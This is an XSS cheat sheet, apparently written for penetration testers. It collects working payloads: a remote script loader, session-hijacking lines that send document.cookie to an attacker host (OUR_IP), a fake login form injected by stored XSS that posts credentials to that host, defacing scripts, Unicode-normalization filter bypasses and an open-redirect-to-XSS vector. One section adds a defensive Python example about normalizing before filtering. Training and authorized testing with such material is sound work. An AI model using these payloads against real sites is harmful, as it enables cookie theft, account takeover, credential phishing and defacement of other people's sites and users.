Cross Site Scripting (XSS)

Introduction

Cross-Site Scripting (XSS) is a web security vulnerability that allows an attacker to compromise the interactions that users have with a vulnerable application. XSS normally allows an attacker to masquerade as a victim user, carrying out any actions that the user is able to perform and accessing any of the user's data. Source: https://portswigger.net/web-security/cross-site-scripting


XSS Useful References

Awesome labs to train your XSS skills: https://xssy.uk/


XSS Tools


Basic XSS Payloads

| Code | Description |
| --- | --- |
| <script>alert(window.origin)</script> | Basic XSS payload |
| <plaintext> | Basic XSS payload |
| <script>print()</script> | Basic XSS payload |
| <img src="" onerror=alert(window.origin)> | HTML-based XSS payload |
| <script src="http://OUR_IP/script.js"></script> | Load remote script |
| <script>new Image().src='http://OUR_IP/index.php?c='+document.cookie</script> | Send cookie details to us |


XSS Filter Evasion - Unicode Normalization

Unicode normalization is the process that maps different binary representations of the same character to a single canonical form. It is crucial when handling strings in programming and data processing.

Depending on how the back end or front end behaves when it receives unusual Unicode characters, an attacker might be able to bypass protections and inject arbitrary characters. The problem typically arises when a filter or WAF inspects the raw input while a later component normalizes it, turning the look-alike characters back into the ASCII metacharacters the filter was meant to block. Sometimes Unicode normalization even allows bypassing the WAFs in place.

You can find a great article about this topic here: https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/

Two lists of unicode normalized characters can be found at:

I made a tool to help convert characters to their corresponding Unicode-normalized value, which I suggest to anyone. You can find my helper tool to perform Unicode normalization here: https://github.com/alessio-romano/UniXSS

If you prefer, you can also find a list of copy-paste unicode normalized characters below:

| Character | Unicode normalization (URL-encoded / HTML entity) |
| --- | --- |
| < | %EF%BC%9C (&#xff1c;), %e2%89%ae (&#x226e;), %ef%b9%a4 (&#xfe64;) |
| > | %EF%BC%9E (&#xff1e;), %e2%89%af (&#x226f;), %ef%b9%a5 (&#xfe65;) |
| ' | %ef%bc%87 |
| " | %ef%bc%82 |
| = | %e2%81%bc |
| / | %ef%bc%8f |
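The ordering problem behind this bypass, as an added Python example that is not part of the original page or of the UniXSS tool: a blocklist that runs before NFKC normalization lets the fullwidth forms from the table through, whereas normalizing first and HTML-encoding on output neutralizes every variant. The request value is constructed from the page's basic payload written with the fullwidth characters above.

```python
import html
import unicodedata
from urllib.parse import unquote

# Constructed request value: the page's basic payload written with the fullwidth
# variants from the table above (U+FF1C "<", U+FF1E ">", U+FF0F "/"), URL-encoded.
CONSTRUCTED_RAW = unquote(
    "%EF%BC%9Cscript%EF%BC%9Ealert(window.origin)%EF%BC%9C%EF%BC%8Fscript%EF%BC%9E"
)


def nfkc(value: str) -> str:
    """Canonicalize to NFKC, the form that folds compatibility variants to ASCII."""
    return unicodedata.normalize("NFKC", value)


def naive_filter(value: str) -> str:
    """Blocklist filter that only knows the ASCII angle brackets."""
    return value.replace("<", "").replace(">", "")


def vulnerable_pipeline(raw: str) -> str:
    """Anti-pattern: filter first, normalize later.

    A WAF or input validator inspects the raw string, finds no '<' or '>',
    and lets it through; a later layer (search index, database collation,
    templating) applies NFKC and turns the fullwidth forms back into markup.
    """
    filtered = naive_filter(raw)
    return nfkc(filtered)


def hardened_pipeline(raw: str) -> str:
    """Normalize once at the trust boundary, then encode for the HTML text context.

    Encoding the canonical string means every variant that normalizes to '<'
    ends up as '&lt;' no matter which Unicode form the request used.
    """
    canonical = nfkc(raw)
    return html.escape(canonical, quote=True)


def contains_markup(rendered: str) -> bool:
    """True if raw angle brackets survived processing (i.e. markup would render)."""
    return "<" in rendered or ">" in rendered


if __name__ == "__main__":
    print("vulnerable:", vulnerable_pipeline(CONSTRUCTED_RAW))
    print("hardened:  ", hardened_pipeline(CONSTRUCTED_RAW))
```

The NFKC step is also where U+226E differs from the other table entries: it only decomposes to "<" under NFD/NFKD, so a canonicalization that uses a composed form leaves it intact and the output encoder must still handle it as a non-ASCII character.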

Open Redirect to XSS

Whenever you face a web application that is vulnerable to open redirects, the same vector may also be usable to gain XSS.

An example is a website that performs the redirect based on a GET parameter, such as the following: vulnerable.com/test.php?redirect_url={value}

Instead of an http or https URL pointing to your attacker website, you may insert a javascript: URL as the value of the redirect_url parameter. For example, navigating to the following URL pops an alert: vulnerable.com/test.php?redirect_url=javascript:alert(document.domain)

This only works when the redirect is performed client-side (for example, by assigning the parameter to window.location); a server-side 3xx response whose Location header points to a javascript: URL is not executed by browsers.


XSS Session Hijacking

  • Use the following XSS payload: <script src=http://OUR_IP/script.js></script>

  • On the attacker machine, write one of the following payloads inside a file named script.js:

    1. new Image().src='http://OUR_IP/index.php?c='+document.cookie

    2. document.location='http://OUR_IP/index.php?c='+document.cookie;


XSS Phishing

  • A common form of XSS phishing relies on stored XSS.

  • The attacker injects a fake login form that sends the entered credentials to an attacker-controlled server.

  • To perform a stored XSS phishing attack, inject HTML code that displays a login form on the targeted page.

  • An example of such a login form is the following (replace OUR_IP in the payload):

document.write('<h3>Please login to continue</h3><form action=http://OUR_IP><input type="username" name="username" placeholder="Username"><input type="password" name="password" placeholder="Password"><input type="submit" name="submit" value="Login"></form>');

XSS Defacing

  • Defacing means changing the website's appearance for anyone who visits it.

  • The appearance can be changed with injected JavaScript code.

  • Note: this requires a stored XSS vulnerability.

| Defacing payload | Description |
| --- | --- |
| <script>document.body.style.background = "#141d2b"</script> | Change website background color |
| <script>document.body.background = "https://example.com/images/logo.svg"</script> | Change website background image |
| <script>document.title = 'New Title'</script> | Change website title |
| document.getElementById("todo").innerHTML = "New Text" | Change HTML element/DOM text using innerHTML |
